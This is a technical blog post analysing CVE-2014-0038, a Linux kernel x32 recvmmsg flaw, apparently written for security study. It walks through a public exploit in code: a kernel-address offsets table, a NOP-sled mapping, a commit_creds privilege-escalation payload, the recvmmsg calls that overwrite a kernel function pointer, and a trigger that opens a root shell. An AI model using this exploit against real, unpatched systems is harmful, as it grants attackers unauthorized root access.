Seteuid0 · 2014/11/07 16:08

Keywords: CVE-2014-0038, kernel vulnerability, PoC, exploit code, local privilege escalation, CVE analysis

Introduction

Solar Designer announced CVE-2014-0038 on the oss-security mailing list on January 31, 2014. The CVE concerns the x32 ABI. The x32 ABI was merged in Linux kernel 3.4, but distributions such as RHEL and Fedora do not enable the corresponding build option (CONFIG_X86_X32), so they are not affected. Ubuntu enables this option in recent versions, so it is affected. The x32 ABI lets programs run in 64-bit mode while using 32-bit addresses, which makes them more efficient; see the references or search online for more information.

Vulnerability principle

First, look at the patch that fixes the CVE:

```diff
diff --git a/net/compat.c b/net/compat.c
index dd32e34..f50161f 100644
--- a/net/compat.c
+++ b/net/compat.c
@@ -780,21 +780,16 @@ asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
 	if (flags & MSG_CMSG_COMPAT)
 		return -EINVAL;
 
-	if (COMPAT_USE_64BIT_TIME)
-		return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
-				      flags | MSG_CMSG_COMPAT,
-				      (struct timespec *) timeout);
-
 	if (timeout == NULL)
 		return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
 				      flags | MSG_CMSG_COMPAT, NULL);
 
-	if (get_compat_timespec(&ktspec, timeout))
+	if (compat_get_timespec(&ktspec, timeout))
 		return -EFAULT;
 
 	datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
 				   flags | MSG_CMSG_COMPAT, &ktspec);
-	if (datagrams > 0 && put_compat_timespec(&ktspec, timeout))
+	if (datagrams > 0 && compat_put_timespec(&ktspec, timeout))
 		datagrams = -EFAULT;
 
 	return datagrams;
```

The CVE exists because the user-space input is not copied: when COMPAT_USE_64BIT_TIME is true, the user-supplied timeout pointer is cast and passed directly to __sys_recvmmsg, which then treats it as a kernel pointer.

As the patch shows, the fix is to always go through compat_get_timespec when timeout is not NULL. That function copies the timeout from user space into a kernel buffer:

```c
int compat_get_timespec(struct timespec *ts, const void __user *uts)
{
    if (COMPAT_USE_64BIT_TIME)
        return copy_from_user(ts, uts, sizeof *ts) ? -EFAULT : 0;
    else
        return get_compat_timespec(ts, uts);
}
```

So what does the kernel do with the timeout pointer it receives? Look at __sys_recvmmsg:

```c
/*
 *     Linux recvmmsg interface
 */

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                   unsigned int flags, struct timespec *timeout)
{
    int fput_needed, err, datagrams;
    struct socket *sock;
    struct mmsghdr __user *entry;
    struct compat_mmsghdr __user *compat_entry;
    struct msghdr msg_sys;
    struct timespec end_time;

    if (timeout &&
        poll_select_set_timeout(&end_time, timeout->tv_sec,
                                timeout->tv_nsec))
        return -EINVAL;

    datagrams = 0;

    sock = sockfd_lookup_light(fd, &err, &fput_needed);
    if (!sock)
        return err;

    err = sock_error(sock->sk);
    if (err)
        goto out_put;

    entry = mmsg;
    compat_entry = (struct compat_mmsghdr __user *)mmsg;

    while (datagrams < vlen) {
        /*
         * No need to ask LSM for more than the first datagram.
         */
        if (MSG_CMSG_COMPAT & flags) {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            if (err < 0)
                break;
            err = __put_user(err, &compat_entry->msg_len);
            ++compat_entry;
        } else {
            err = ___sys_recvmsg(sock,
                                 (struct msghdr __user *)entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            if (err < 0)
                break;
            err = put_user(err, &entry->msg_len);
            ++entry;
        }

        if (err)
            break;
        ++datagrams;

        /* MSG_WAITFORONE turns on MSG_DONTWAIT after one packet */
        if (flags & MSG_WAITFORONE)
            flags |= MSG_DONTWAIT;

        if (timeout) {
            ktime_get_ts(timeout);
            *timeout = timespec_sub(end_time, *timeout);
            if (timeout->tv_sec < 0) {
                timeout->tv_sec = timeout->tv_nsec = 0;
                break;
            }

            /* Timeout, return less than vlen datagrams */
            if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
                break;
        }

        /* Out of band data, return right away */
        if (msg_sys.msg_flags & MSG_OOB)
            break;
    }

out_put:
    fput_light(sock->file, fput_needed);

    if (err == 0)
        return datagrams;

    if (datagrams != 0) {
        /*
         * We may return less entries than requested (vlen) if the
         * sock is non block and there aren't enough datagrams...
         */
        if (err != -EAGAIN) {
            /*
             * ... or if recvmsg returns an error after we
             * received some datagrams, where we record the
             * error to return on the next call or if the
             * app asks about it using getsockopt(SO_ERROR).
             */
            sock->sk->sk_err = -err;
        }

        return datagrams;
    }

    return err;
}
```

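The function first sets an end time from the values read through timeout:

```c
poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec)
```

Then, after each received datagram, the following code writes the remaining time back through timeout and guarantees that the written value is >= 0: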

```c
if (timeout) {
    ktime_get_ts(timeout);
    *timeout = timespec_sub(end_time, *timeout);
    if (timeout->tv_sec < 0) {
        timeout->tv_sec = timeout->tv_nsec = 0;
        break;
    }

    /* Timeout, return less than vlen datagrams */
    if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
        break;
}
```
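The write-back behaviour can be sketched in user space as follows. This is only an illustration: struct ts_sketch and remaining_or_zero are hypothetical names, and the subtraction is a simplified stand-in for the kernel's timespec_sub followed by the clamp shown above.

```c
#include <assert.h>

#define NSEC_PER_SEC_SKETCH 1000000000L

/* Hypothetical stand-in for the kernel's struct timespec. */
struct ts_sketch {
    long long tv_sec;
    long tv_nsec;
};

/*
 * Compute end_time - now, then clamp to 0/0 once the deadline has passed.
 * This mirrors the value that ends up stored at *timeout.
 */
struct ts_sketch remaining_or_zero(struct ts_sketch end_time, struct ts_sketch now)
{
    struct ts_sketch left;

    /* Both inputs are assumed to be normalized timespec values. */
    assert(end_time.tv_nsec >= 0 && end_time.tv_nsec < NSEC_PER_SEC_SKETCH);
    assert(now.tv_nsec >= 0 && now.tv_nsec < NSEC_PER_SEC_SKETCH);

    left.tv_sec = end_time.tv_sec - now.tv_sec;
    left.tv_nsec = end_time.tv_nsec - now.tv_nsec;
    if (left.tv_nsec < 0) {          /* borrow one second */
        left.tv_sec -= 1;
        left.tv_nsec += NSEC_PER_SEC_SKETCH;
    }
    if (left.tv_sec < 0) {           /* deadline passed: write back zero */
        left.tv_sec = 0;
        left.tv_nsec = 0;
    }
    return left;
}
```

The point of the sketch is that whatever is stored through the pointer is either a smaller non-negative value or exactly zero, which is what makes the write useful for clearing bytes.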

In addition, poll_select_set_timeout validates the timespec, so the tv_sec and tv_nsec read through timeout must form a valid timespec structure. In other words, when choosing a target address, the memory at and just after that address must already satisfy the following checks:

```c
/*
 * Returns true if the timespec is norm, false if denorm:
 */
static inline bool timespec_valid(const struct timespec *ts)
{
    /* Dates before 1970 are bogus */
    if (ts->tv_sec < 0)
        return false;
    /* Can't have more nanoseconds then a second */
    if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC)
        return false;
    return true;
}
```

include/linux/time.h: #define NSEC_PER_SEC 1000000000L
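To make the constraint concrete, here is a minimal sketch that checks whether the 16 bytes at a candidate target address would pass timespec_valid. The helper names load_le64 and bytes_pass_timespec_valid are hypothetical, and the bytes are decoded as little-endian, as on x86-64.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define NSEC_PER_SEC_SKETCH 1000000000ULL

/* Decode 8 bytes as a little-endian 64-bit value (x86-64 layout). */
uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/*
 * Hypothetical helper: would the kernel accept the 16 bytes at mem as a
 * timespec? Bytes 0..7 are read as tv_sec, bytes 8..15 as tv_nsec.
 */
bool bytes_pass_timespec_valid(const unsigned char *mem)
{
    assert(mem != NULL);

    uint64_t tv_sec = load_le64(mem);
    uint64_t tv_nsec = load_le64(mem + 8);

    if (tv_sec >> 63)                    /* sign bit set: tv_sec < 0 */
        return false;
    if (tv_nsec >= NSEC_PER_SEC_SKETCH)  /* more than a second of nanoseconds */
        return false;
    return true;
}
```

For example, a kernel function pointer such as 0xffffffff816d4ff0 read as tv_sec from its first byte is negative and fails the check, while pointing at only its top byte (0xff followed by zero bytes, an assumption about the neighbouring memory) gives tv_sec = 255 and passes.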

By now we know that, by carefully exploiting how timeout is handled, we can point timeout at a chosen kernel address whose contents look like a valid timeout structure, let the kernel overwrite it, and thereby achieve privilege escalation.

Exploit code analysis

There are currently two exploits on Exploit-DB. They rely on basically the same principle but pick different kernel structures as the target address. This article analyzes the exploit code at www.exploit-db.com/exploits/31…

This exploit works roughly the same way as many other kernel privilege-escalation exploits: it uses the vulnerable system call to change a specific kernel function pointer into a user-space address, then maps the privilege-escalation code at that user-space address. When the modified function pointer is later invoked, the kernel executes the user-supplied code with kernel privileges. The details are explained below alongside the code.

On 64-bit systems the address space is so large that kernel space and user space are distinguished simply by whether the high bits are 1 or 0. The kernel-space address range is 0xFFFF FFFF FFFF FFFF down to 0xFFFF 8000 0000 0000. The user-space address range is 0x0000 7FFF FFFF FFFF down to 0x0000 0000 0000 0000. So it is enough to use the timeout handling to turn the high 1 bits of a pointer into 0.
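The address split can be sketched as below, assuming the usual 48-bit x86-64 layout with the two ranges given above. The function names are hypothetical; the sample pointer is the net_ctl_permissions value that the exploit lists for 3.11.0-15-generic.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define KERNEL_HALF_START 0xffff800000000000ULL
#define USER_HALF_END     0x00007fffffffffffULL

/* True if addr lies in the kernel half of the address space. */
bool is_kernel_address(uint64_t addr)
{
    return addr >= KERNEL_HALF_START;
}

/* True if addr lies in the user half of the address space. */
bool is_user_address(uint64_t addr)
{
    return addr <= USER_HALF_END;
}

/* Zero the n most significant bytes of addr (0 <= n <= 8). */
uint64_t clear_top_bytes(uint64_t addr, unsigned n)
{
    assert(n <= 8);
    if (n == 0)
        return addr;
    if (n == 8)
        return 0;
    return addr & (~0ULL >> (8 * n));
}
```

With 0xffffffff816d4ff0 as input, clearing two bytes gives 0x0000ffff816d4ff0, which falls in neither range, while clearing three bytes gives 0x000000ff816d4ff0, a user-space address. This is consistent with the exploit clearing three bytes rather than two.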

The exploit targets the permissions function pointer of the net_sysctl_root structure, which normally points to net_ctl_permissions. Because function addresses differ between kernel versions, the exploit defines a structure that stores the required addresses for each supported kernel version, so that it can escalate privileges on several kernels whose addresses are known.

```c
struct offset {
    char *kernel_version;
    unsigned long dest;            // net_sysctl_root + 96
    unsigned long original_value;  // net_ctl_permissions
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

struct offset offsets[] = {
    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0,0xffffffff81084500}, // Ubuntu 13.04
    {NULL,0,0,0,0}
};
```

The exploit starts by checking the running kernel against this table and selects the matching entry offsets[i], which holds the addresses it will use.
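A lookup along these lines could be sketched as follows. find_offset is a hypothetical helper, not the exploit's own code; the table values are the ones listed above, and unsigned long is assumed to be 64 bits wide (LP64).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

struct offset {
    const char *kernel_version;
    unsigned long dest;            /* net_sysctl_root + 96 */
    unsigned long original_value;  /* net_ctl_permissions */
    unsigned long prepare_kernel_cred;
    unsigned long commit_creds;
};

static const struct offset offsets[] = {
    {"3.11.0-15-generic", 0xffffffff81cdf400UL + 96, 0xffffffff816d4ff0UL,
     0xffffffff8108afb0UL, 0xffffffff8108ace0UL},
    {"3.11.0-12-generic", 0xffffffff81cdf3a0UL, 0xffffffff816d32a0UL,
     0xffffffff8108b010UL, 0xffffffff8108ad40UL},
    {"3.8.0-19-generic", 0xffffffff81cc7940UL, 0xffffffff816a7f40UL,
     0xffffffff810847c0UL, 0xffffffff81084500UL},
    {NULL, 0, 0, 0, 0}
};

/*
 * Return the table entry whose kernel_version equals release,
 * or NULL if this kernel is not in the table.
 */
const struct offset *find_offset(const char *release)
{
    assert(release != NULL);

    for (size_t i = 0; offsets[i].kernel_version != NULL; i++) {
        if (strcmp(offsets[i].kernel_version, release) == 0)
            return &offsets[i];
    }
    return NULL;
}
```

In practice the release string would come from the release field filled in by uname(2); a NULL result means the kernel's addresses are unknown and the exploit cannot proceed.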

Next, the address of net_ctl_permissions is page-aligned and its upper 6*4 bits (the top three bytes) are set to 0, which yields a user-space address.

```c
mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;
```
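As a worked example of this computation, the sketch below applies the same two masks to the net_ctl_permissions address listed for 3.11.0-15-generic, assuming a 4096-byte page. The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Round addr down to the start of its page; page_size must be a power of two. */
uint64_t page_base(uint64_t addr, uint64_t page_size)
{
    assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
    return addr & ~(page_size - 1);
}

/*
 * User-space base address for the mapping: page-align the kernel
 * function address, then clear its top 24 bits.
 */
uint64_t mapping_base(uint64_t kernel_fn, uint64_t page_size)
{
    return page_base(kernel_fn, page_size) & 0x000000ffffffffffULL;
}
```

For 0xffffffff816d4ff0 this gives a base of 0x000000ff816d4000. Once the top three bytes of the pointer are cleared, it becomes 0x000000ff816d4ff0, which lies inside the first page of a mapping that starts at that base.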

This address is then used as the base of a three-page mapping that is initially readable, writable, and executable. The mapping is filled with 0x90 (NOP) to build a NOP sled, the privilege-escalation trampoline is copied to the start of the second page, and the mapping is finally switched to read and execute only.

```c
mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3,
                     PROT_READ|PROT_WRITE|PROT_EXEC,
                     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(mmapped == -1) {
    perror("mmap()");
    exit(-1);
}

/* fill all three pages with NOPs */
memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);

/* place the trampoline at the start of the second page */
memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);

if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
    perror("mprotect()");
    exit(-1);
}
```

The privilege-escalation code is the traditional kernel payload: it replaces the process's credentials by calling commit_creds(prepare_kernel_cred(0)). Note that the addresses of commit_creds and prepare_kernel_cred also depend on the kernel version, so they are stored in the offset structure as well and must be set for each specific kernel.

```c
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

void __attribute__((regparm(3)))
trampoline()
{
    asm("mov $getroot, %rax; call *%rax;");
}
```

With the environment prepared, the vulnerable __NR_recvmmsg system call is used to change the value of the permissions pointer in net_sysctl_root.

```c
static struct ctl_table_root net_sysctl_root = {
    .lookup = net_ctl_header_lookup,
    .permissions = net_ctl_permissions,
};
```

ctl_table_root is defined as:

```c
struct ctl_table_root {
    struct ctl_table_set default_set;
    struct ctl_table_set *(*lookup)(struct ctl_table_root *root,
                                    struct nsproxy *namespaces);
    int (*permissions)(struct ctl_table_header *head, struct ctl_table *table);
};
```

Working through the layout of ctl_table_root shows that the permissions field is located at net_sysctl_root + 96.

The timeout handling of the system call is then used to change the upper 6*4 bits of the .permissions value from 1 to 0.

```c
for(i=0; i < 3; i++) {
    udp(i);
    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
    if(!retval) {
        fprintf(stderr,"\nrecvmmsg() failed\n");
    }
}
```

The system call is made three times. The three calls in turn change the FF to 00 in 0xFF**************, 0x00FF************, and 0x0000FF**********.

After they complete, the permissions pointer points to the user-space region that was filled with the privilege-escalation code. Note that the processing must start from the highest byte. Because the processes run in parallel, the timeout value and the sleep value cannot be guaranteed to match exactly; and since the tv_sec written back is always >= 0, working downward from the highest byte avoids borrowing from the byte above. This is also one of the conditions for choosing the target structure.

Since 0xFF * 3 = 765 seconds, the exploit needs about 13 minutes to turn the address stored in permissions into a user-space address.
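The three rounds can be simulated on a byte array, as sketched below. The function names are hypothetical, the memory is decoded as little-endian, and the simulation assumes that the bytes following the pointer are zero and that each timeout fully expires so the kernel writes back 0/0.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Decode 8 bytes as a little-endian 64-bit value (x86-64 layout). */
uint64_t load_le64(const unsigned char *p)
{
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/*
 * Simulate `rounds` calls with timeout pointing at mem + 7 - i.
 * mem[0..7] holds the function pointer. Returns the total number of
 * seconds the calls would have to wait.
 */
uint64_t simulate_rounds(unsigned char *mem, size_t len, int rounds)
{
    uint64_t total_secs = 0;

    for (int i = 0; i < rounds; i++) {
        size_t off = (size_t)(7 - i);
        assert(off + 16 <= len);

        uint64_t tv_sec = load_le64(mem + off);
        uint64_t tv_nsec = load_le64(mem + off + 8);

        /* The same conditions timespec_valid() enforces. */
        assert((tv_sec >> 63) == 0);
        assert(tv_nsec < 1000000000ULL);

        total_secs += tv_sec;

        /* Expired timeout: tv_sec and tv_nsec are written back as 0. */
        memset(mem + off, 0, 16);
    }
    return total_secs;
}
```

Starting from 0xffffffff816d4ff0, each round reads tv_sec = 0xFF (255 seconds) because every byte above the current one has already been zeroed, and the pointer ends up as 0x000000ff816d4ff0 after 3 * 255 = 765 seconds in total.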

Everything is now in place. All that remains is to trigger a call through the modified net_sysctl_root->permissions pointer.

```c
void trigger() {
    open("/proc/sys/net/core/somaxconn",O_RDONLY);

    if(getuid() != 0) {
        fprintf(stderr,"not root, ya blew it!\n");
        exit(-1);
    }

    fprintf(stderr,"w00p w00p!\n");
    system("/bin/sh -i");
}
```

This completes the analysis of the CVE. Although the principle behind the vulnerability is relatively simple, the way it is ultimately exploited is very clever and well worth studying.

References

1. en.wikipedia.org/wiki/X32_AB…